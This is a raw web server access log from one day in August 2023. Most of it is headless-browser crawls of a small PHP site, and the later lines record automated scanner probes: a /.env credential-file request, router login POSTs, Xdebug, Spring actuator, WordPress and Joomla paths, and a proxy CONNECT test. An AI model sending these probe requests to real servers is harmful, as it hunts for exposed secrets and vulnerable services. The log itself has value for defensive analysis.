36.99.136.137 - - [27/Aug/2023:11:54:51 +0200] "GET /gui/javascript/jquery/jquery-tooltip/jquery.tooltip.min.js HTTP/1.1" 200 1982 "http://212.69.160.11/entry.php?id=10273" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/111.0.5553.0 Safari/537.36"
36.99.136.136 - - [27/Aug/2023:11:54:50 +0200] "GET /gui/javascript/jquery/js/jquery-ui-1.9.0.custom.min.js HTTP/1.1" 200 51286 "http://212.69.160.11/entry.php?id=10273" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/111.0.5553.0 Safari/537.36"
36.99.136.136 - - [27/Aug/2023:11:54:53 +0200] "GET /entry.php?id=10287 HTTP/1.1" 200 2385 "http://212.69.160.11/entry.php?id=11412" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/111.0.5553.0 Safari/537.36"
36.99.136.137 - - [27/Aug/2023:11:54:53 +0200] "GET /framework/webfx/javascript/toolbar/ieemu.js HTTP/1.1" 200 2366 "http://212.69.160.11/entry.php?id=10273" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/111.0.5553.0 Safari/537.36"
36.99.136.137 - - [27/Aug/2023:11:54:53 +0200] "GET /framework/webfx/javascript/toolbar/cb2.js HTTP/1.1" 200 1686 "http://212.69.160.11/entry.php?id=10273" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/111.0.5553.0 Safari/537.36"
36.99.136.136 - - [27/Aug/2023:11:54:54 +0200] "GET /gui/javascript/form_form.js?1693130086 HTTP/1.1" 200 16206 "http://212.69.160.11/entry.php?id=10272" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/111.0.5553.0 Safari/537.36"
36.99.136.136 - - [27/Aug/2023:11:54:56 +0200] "GET /activities.ico HTTP/1.1" 200 1406 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36"
36.99.136.137 - - [27/Aug/2023:11:55:00 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36"
36.99.136.137 - - [27/Aug/2023:11:55:01 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 11_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36"
111.7.100.32 - - [27/Aug/2023:11:55:03 +0200] "GET /layout.php HTTP/1.1" 200 817 "http://zafi.castlegem.co.uk/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/108.0.5359.94 Safari/537.36"
111.7.100.34 - - [27/Aug/2023:11:55:03 +0200] "GET /gui/javascript/form_form.js HTTP/1.1" 200 16206 "http://zafi.castlegem.co.uk/layout.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/108.0.5359.94 Safari/537.36"
111.7.100.32 - - [27/Aug/2023:11:55:04 +0200] "GET /entry.php?id=10273 HTTP/1.1" 200 1902 "http://zafi.castlegem.co.uk/layout.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/108.0.5359.94 Safari/537.36"
111.7.100.35 - - [27/Aug/2023:11:55:04 +0200] "GET /entry.php?id=10270 HTTP/1.1" 200 909 "http://zafi.castlegem.co.uk/layout.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/108.0.5359.94 Safari/537.36"
111.7.100.33 - - [27/Aug/2023:11:55:04 +0200] "GET /entry.php?id=11412 HTTP/1.1" 200 1759 "http://zafi.castlegem.co.uk/layout.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/108.0.5359.94 Safari/537.36"
111.7.100.34 - - [27/Aug/2023:11:55:04 +0200] "GET /entry.php?id=10272 HTTP/1.1" 200 1159 "http://zafi.castlegem.co.uk/layout.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/108.0.5359.94 Safari/537.36"
111.7.100.32 - - [27/Aug/2023:11:55:04 +0200] "GET /gui/javascript/jquery/css/gui-themes/custom.min.css HTTP/1.1" 200 5618 "http://zafi.castlegem.co.uk/entry.php?id=10273" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/108.0.5359.94 Safari/537.36"
111.7.100.35 - - [27/Aug/2023:11:55:04 +0200] "GET /gui/javascript/jquery/css/gui-themes/ui.spinner.css HTTP/1.1" 200 350 "http://zafi.castlegem.co.uk/entry.php?id=10273" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/108.0.5359.94 Safari/537.36"
111.7.100.34 - - [27/Aug/2023:11:55:04 +0200] "GET /gui/javascript/jquery/css/gui-themes/jquery.tooltip.css HTTP/1.1" 200 246 "http://zafi.castlegem.co.uk/entry.php?id=10273" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/108.0.5359.94 Safari/537.36"
111.7.100.34 - - [27/Aug/2023:11:55:05 +0200] "GET /framework/webfx/style/toolbar/cb2.css HTTP/1.1" 200 793 "http://zafi.castlegem.co.uk/entry.php?id=10273" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/108.0.5359.94 Safari/537.36"
111.7.100.33 - - [27/Aug/2023:11:55:05 +0200] "GET /gui/styles/tmplDefault.css HTTP/1.1" 200 2135 "http://zafi.castlegem.co.uk/entry.php?id=11412" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/108.0.5359.94 Safari/537.36"
111.7.100.32 - - [27/Aug/2023:11:55:05 +0200] "GET /gui/javascript/form_form.js?1693130104 HTTP/1.1" 200 16206 "http://zafi.castlegem.co.uk/entry.php?id=10273" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/108.0.5359.94 Safari/537.36"
111.7.100.34 - - [27/Aug/2023:11:55:05 +0200] "GET /gui/javascript/jquery/js/jquery-1.8.2.js HTTP/1.1" 200 35391 "http://zafi.castlegem.co.uk/entry.php?id=10273" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/108.0.5359.94 Safari/537.36"
111.7.100.33 - - [27/Aug/2023:11:55:05 +0200] "GET /gui/javascript/jquery/jquery-tooltip/jquery.tooltip.min.js HTTP/1.1" 200 1982 "http://zafi.castlegem.co.uk/entry.php?id=10273" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/108.0.5359.94 Safari/537.36"
111.7.100.35 - - [27/Aug/2023:11:55:05 +0200] "GET /gui/javascript/jquery/js/jquery-ui-1.9.0.custom.min.js HTTP/1.1" 200 51286 "http://zafi.castlegem.co.uk/entry.php?id=10273" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/108.0.5359.94 Safari/537.36"
111.7.100.32 - - [27/Aug/2023:11:55:05 +0200] "GET /framework/webfx/javascript/toolbar/ieemu.js HTTP/1.1" 200 2366 "http://zafi.castlegem.co.uk/entry.php?id=10273" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/108.0.5359.94 Safari/537.36"
111.7.100.35 - - [27/Aug/2023:11:55:05 +0200] "GET /framework/webfx/javascript/statusbar/statusBar.js HTTP/1.1" 200 649 "http://zafi.castlegem.co.uk/entry.php?id=10272" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/108.0.5359.94 Safari/537.36"
111.7.100.33 - - [27/Aug/2023:11:55:05 +0200] "GET /framework/webfx/javascript/toolbar/cb2.js HTTP/1.1" 200 1686 "http://zafi.castlegem.co.uk/entry.php?id=10273" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/108.0.5359.94 Safari/537.36"
36.99.136.129 - - [27/Aug/2023:11:55:06 +0200] "GET /activities.ico HTTP/1.1" 200 1406 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36"
111.7.100.32 - - [27/Aug/2023:11:55:06 +0200] "GET /entry.php?id=10287 HTTP/1.1" 200 2384 "http://zafi.castlegem.co.uk/entry.php?id=11412" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/108.0.5359.94 Safari/537.36"
111.7.100.35 - - [27/Aug/2023:11:55:06 +0200] "GET /entry.php?id=10271& HTTP/1.1" 200 934 "http://zafi.castlegem.co.uk/entry.php?id=10272" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/108.0.5359.94 Safari/537.36"
111.7.100.33 - - [27/Aug/2023:11:55:06 +0200] "GET /gui/javascript/form_form.js?1693130106 HTTP/1.1" 200 16206 "http://zafi.castlegem.co.uk/entry.php?id=10287" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/108.0.5359.94 Safari/537.36"
111.7.100.33 - - [27/Aug/2023:11:55:07 +0200] "GET /entry.php?id=10273& HTTP/1.1" 200 1901 "http://zafi.castlegem.co.uk/entry.php?id=10287" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/108.0.5359.94 Safari/537.36"
111.7.100.35 - - [27/Aug/2023:11:55:07 +0200] "GET /entry.php?id=10270& HTTP/1.1" 200 909 "http://zafi.castlegem.co.uk/entry.php?id=10287" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/108.0.5359.94 Safari/537.36"
111.7.100.34 - - [27/Aug/2023:11:55:08 +0200] "GET /gui/javascript/form_form.js?1693130107 HTTP/1.1" 200 16206 "http://zafi.castlegem.co.uk/entry.php?id=10273&" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/108.0.5359.94 Safari/537.36"
36.99.136.136 - - [27/Aug/2023:11:55:11 +0200] "GET /framework/webfx/javascript/statusbar/statusBar.js HTTP/1.1" 200 649 "http://212.69.160.11/entry.php?id=10272" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/111.0.5553.0 Safari/537.36"
36.99.136.137 - - [27/Aug/2023:11:55:12 +0200] "GET /entry.php?id=10271& HTTP/1.1" 200 935 "http://212.69.160.11/entry.php?id=10272" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/111.0.5553.0 Safari/537.36"
36.99.136.137 - - [27/Aug/2023:11:55:12 +0200] "GET /gui/javascript/form_form.js?1693130093 HTTP/1.1" 200 16206 "http://212.69.160.11/entry.php?id=10287" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/111.0.5553.0 Safari/537.36"
36.99.136.136 - - [27/Aug/2023:11:55:14 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36"
36.99.136.129 - - [27/Aug/2023:11:55:16 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 11_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36"
36.99.136.137 - - [27/Aug/2023:11:55:16 +0200] "GET /entry.php?id=10273& HTTP/1.1" 200 1901 "http://212.69.160.11/entry.php?id=10287" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/111.0.5553.0 Safari/537.36"
36.99.136.137 - - [27/Aug/2023:11:55:17 +0200] "GET /entry.php?id=10270& HTTP/1.1" 200 909 "http://212.69.160.11/entry.php?id=10287" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/111.0.5553.0 Safari/537.36"
36.99.136.136 - - [27/Aug/2023:11:55:17 +0200] "GET /layout.php HTTP/1.1" 200 814 "http://mail.creativecube.at/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/111.0.5553.0 Safari/537.36"
36.99.136.136 - - [27/Aug/2023:11:55:17 +0200] "GET /gui/javascript/form_form.js?1693130112 HTTP/1.1" 200 16206 "http://212.69.160.11/entry.php?id=10271&" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/111.0.5553.0 Safari/537.36"
36.99.136.137 - - [27/Aug/2023:11:55:17 +0200] "GET /gui/javascript/form_form.js HTTP/1.1" 200 16206 "http://mail.creativecube.at/layout.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/111.0.5553.0 Safari/537.36"
36.99.136.137 - - [27/Aug/2023:11:55:18 +0200] "GET /entry.php?id=10273 HTTP/1.1" 200 1901 "http://mail.creativecube.at/layout.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/111.0.5553.0 Safari/537.36"
36.99.136.136 - - [27/Aug/2023:11:55:18 +0200] "GET /entry.php?id=10270 HTTP/1.1" 200 909 "http://mail.creativecube.at/layout.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/111.0.5553.0 Safari/537.36"
36.99.136.136 - - [27/Aug/2023:11:55:18 +0200] "GET /entry.php?id=11412 HTTP/1.1" 200 1759 "http://mail.creativecube.at/layout.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/111.0.5553.0 Safari/537.36"
36.99.136.129 - - [27/Aug/2023:11:55:18 +0200] "GET /activities.ico HTTP/1.1" 200 1406 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36"
36.99.136.137 - - [27/Aug/2023:11:55:18 +0200] "GET /gui/javascript/jquery/css/gui-themes/custom.min.css HTTP/1.1" 200 5618 "http://mail.creativecube.at/entry.php?id=10273" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/111.0.5553.0 Safari/537.36"
36.99.136.137 - - [27/Aug/2023:11:55:19 +0200] "GET /entry.php?id=10272 HTTP/1.1" 200 1159 "http://mail.creativecube.at/layout.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/111.0.5553.0 Safari/537.36"
36.99.136.136 - - [27/Aug/2023:11:55:19 +0200] "GET /gui/javascript/jquery/css/gui-themes/ui.spinner.css HTTP/1.1" 200 350 "http://mail.creativecube.at/entry.php?id=10273" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/111.0.5553.0 Safari/537.36"
36.99.136.136 - - [27/Aug/2023:11:55:19 +0200] "GET /gui/javascript/jquery/css/gui-themes/jquery.tooltip.css HTTP/1.1" 200 246 "http://mail.creativecube.at/entry.php?id=10273" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/111.0.5553.0 Safari/537.36"
36.99.136.137 - - [27/Aug/2023:11:55:20 +0200] "GET /framework/webfx/style/toolbar/cb2.css HTTP/1.1" 200 793 "http://mail.creativecube.at/entry.php?id=10273" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/111.0.5553.0 Safari/537.36"
36.99.136.136 - - [27/Aug/2023:11:55:20 +0200] "GET /gui/styles/tmplDefault.css HTTP/1.1" 200 2135 "http://mail.creativecube.at/entry.php?id=11412" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/111.0.5553.0 Safari/537.36"
36.99.136.137 - - [27/Aug/2023:11:55:20 +0200] "GET /gui/javascript/form_form.js?1693130118 HTTP/1.1" 200 16206 "http://mail.creativecube.at/entry.php?id=10273" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/111.0.5553.0 Safari/537.36"
36.99.136.137 - - [27/Aug/2023:11:55:20 +0200] "GET /gui/javascript/form_form.js?1693130116 HTTP/1.1" 200 16206 "http://212.69.160.11/entry.php?id=10273&" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/111.0.5553.0 Safari/537.36"
36.99.136.137 - - [27/Aug/2023:11:55:22 +0200] "GET /gui/javascript/jquery/jquery-tooltip/jquery.tooltip.min.js HTTP/1.1" 200 1982 "http://mail.creativecube.at/entry.php?id=10273" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/111.0.5553.0 Safari/537.36"
36.99.136.137 - - [27/Aug/2023:11:55:22 +0200] "GET /gui/javascript/jquery/js/jquery-ui-1.9.0.custom.min.js HTTP/1.1" 200 51286 "http://mail.creativecube.at/entry.php?id=10273" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/111.0.5553.0 Safari/537.36"
111.7.100.35 - - [27/Aug/2023:11:55:29 +0200] "-" 408 - "-" "-"
36.99.136.137 - - [27/Aug/2023:11:55:21 +0200] "GET /gui/javascript/jquery/js/jquery-1.8.2.js HTTP/1.1" 200 35391 "http://mail.creativecube.at/entry.php?id=10273" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/111.0.5553.0 Safari/537.36"
36.99.136.136 - - [27/Aug/2023:11:55:32 +0200] "GET /entry.php?id=10287 HTTP/1.1" 200 2385 "http://mail.creativecube.at/entry.php?id=11412" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/111.0.5553.0 Safari/537.36"
36.99.136.136 - - [27/Aug/2023:11:55:33 +0200] "GET /framework/webfx/javascript/toolbar/ieemu.js HTTP/1.1" 200 2366 "http://mail.creativecube.at/entry.php?id=10273" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/111.0.5553.0 Safari/537.36"
36.99.136.136 - - [27/Aug/2023:11:55:42 +0200] "GET /framework/webfx/javascript/toolbar/cb2.js HTTP/1.1" 200 1686 "http://mail.creativecube.at/entry.php?id=10273" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/111.0.5553.0 Safari/537.36"
36.99.136.137 - - [27/Aug/2023:11:55:49 +0200] "GET /framework/webfx/javascript/statusbar/statusBar.js HTTP/1.1" 200 649 "http://mail.creativecube.at/entry.php?id=10272" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/111.0.5553.0 Safari/537.36"
36.99.136.136 - - [27/Aug/2023:11:55:49 +0200] "GET /gui/javascript/form_form.js?1693130119 HTTP/1.1" 200 16206 "http://mail.creativecube.at/entry.php?id=10272" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/111.0.5553.0 Safari/537.36"
36.99.136.136 - - [27/Aug/2023:11:55:51 +0200] "GET /entry.php?id=10271& HTTP/1.1" 200 934 "http://mail.creativecube.at/entry.php?id=10272" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/111.0.5553.0 Safari/537.36"
36.99.136.137 - - [27/Aug/2023:11:55:52 +0200] "GET /gui/javascript/form_form.js?1693130132 HTTP/1.1" 200 16206 "http://mail.creativecube.at/entry.php?id=10287" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/111.0.5553.0 Safari/537.36"
36.99.136.137 - - [27/Aug/2023:11:55:54 +0200] "GET /entry.php?id=10270& HTTP/1.1" 200 909 "http://mail.creativecube.at/entry.php?id=10287" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/111.0.5553.0 Safari/537.36"
36.99.136.136 - - [27/Aug/2023:11:55:55 +0200] "GET /gui/javascript/form_form.js?1693130151 HTTP/1.1" 200 16206 "http://mail.creativecube.at/entry.php?id=10271&" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/111.0.5553.0 Safari/537.36"
36.99.136.137 - - [27/Aug/2023:11:56:04 +0200] "GET /entry.php?id=10273& HTTP/1.1" 200 1902 "http://mail.creativecube.at/entry.php?id=10287" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/111.0.5553.0 Safari/537.36"
36.99.136.137 - - [27/Aug/2023:11:56:04 +0200] "GET /gui/javascript/form_form.js?1693130154 HTTP/1.1" 200 16206 "http://mail.creativecube.at/entry.php?id=10270&" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/111.0.5553.0 Safari/537.36"
36.99.136.136 - - [27/Aug/2023:11:56:23 +0200] "GET /gui/javascript/form_form.js?1693130164 HTTP/1.1" 200 16206 "http://mail.creativecube.at/entry.php?id=10273&" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/111.0.5553.0 Safari/537.36"
31.220.1.83 - - [27/Aug/2023:12:00:40 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
205.210.31.80 - - [27/Aug/2023:12:07:36 +0200] "\x16\x03\x01" 400 383 "-" "-"
31.220.1.83 - - [27/Aug/2023:12:41:45 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
64.62.197.189 - - [27/Aug/2023:13:19:24 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
64.62.197.188 - - [27/Aug/2023:13:20:37 +0200] "GET /favicon.ico HTTP/1.1" 404 284 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
64.62.197.186 - - [27/Aug/2023:13:21:23 +0200] "GET /geoserver/web/ HTTP/1.1" 404 284 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
83.97.73.87 - - [27/Aug/2023:13:23:48 +0200] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
84.54.51.12 - - [27/Aug/2023:13:30:55 +0200] "CONNECT google.com:443 HTTP/1.1" 200 423 "-" "Go-http-client/1.1"
45.227.254.49 - - [27/Aug/2023:14:08:31 +0200] "\x03" 400 383 "-" "-"
185.36.81.33 - - [27/Aug/2023:14:14:04 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
41.216.188.164 - - [27/Aug/2023:14:25:09 +0200] "GET /wp-content/plugins/core-plugin/include.php HTTP/1.1" 404 317 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
96.127.174.90 - - [27/Aug/2023:14:30:20 +0200] "GET / HTTP/1.1" 200 423 "-" "Hello World"
83.97.73.87 - - [27/Aug/2023:14:31:25 +0200] "GET /actuator/gateway/routes HTTP/1.1" 404 293 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
154.16.105.249 - - [27/Aug/2023:14:55:33 +0200] "GET /~ridersde/joomla/index.php?option=com_xijc&view=captcha HTTP/1.0" 404 309 "https://www.google.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:69.0) Gecko/20100101 Firefox/69.0"
84.54.51.146 - - [27/Aug/2023:15:48:57 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 293 "http://212.69.160.11:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
46.191.249.34 - - [27/Aug/2023:15:50:00 +0200] "GET / HTTP/1.0" 200 423 "http://food-and-drink.vienna-lodgings.at/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36"
107.170.254.23 - - [27/Aug/2023:15:52:24 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 zgrab/0.x"
94.102.61.10 - - [27/Aug/2023:16:11:11 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
71.6.134.232 - - [27/Aug/2023:16:19:26 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36"
71.6.134.232 - - [27/Aug/2023:16:36:32 +0200] "\x16\x03\x01" 400 383 "-" "-"
31.94.67.194 - - [27/Aug/2023:16:45:18 +0200] "GET /.env HTTP/1.1" 404 280 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
31.94.67.194 - - [27/Aug/2023:16:45:18 +0200] "POST / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
165.231.182.65 - - [27/Aug/2023:17:39:21 +0200] "GET /~ridersde/joomla/index.php?option=com_xijc&view=captcha HTTP/1.0" 404 309 "https://www.google.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:77.0) Gecko/20100101 Firefox/77.0"
104.168.96.242 - - [27/Aug/2023:17:41:46 +0200] "GET /config/getuser?index=0 HTTP/1.1" 404 287 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
183.136.225.45 - - [27/Aug/2023:17:44:47 +0200] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0"
162.216.149.25 - - [27/Aug/2023:17:48:39 +0200] "GET / HTTP/1.1" 200 423 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
183.136.225.45 - - [27/Aug/2023:17:56:53 +0200] "GET /activities.ico HTTP/1.1" 200 1406 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE"
90.180.137.191 - - [27/Aug/2023:19:35:28 +0200] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
34.67.136.168 - - [27/Aug/2023:19:41:37 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (compatible; tchelebi/1.0; +http://tchelebi.io)"
179.43.191.194 - - [27/Aug/2023:22:24:34 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 293 "http://212.69.160.11:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
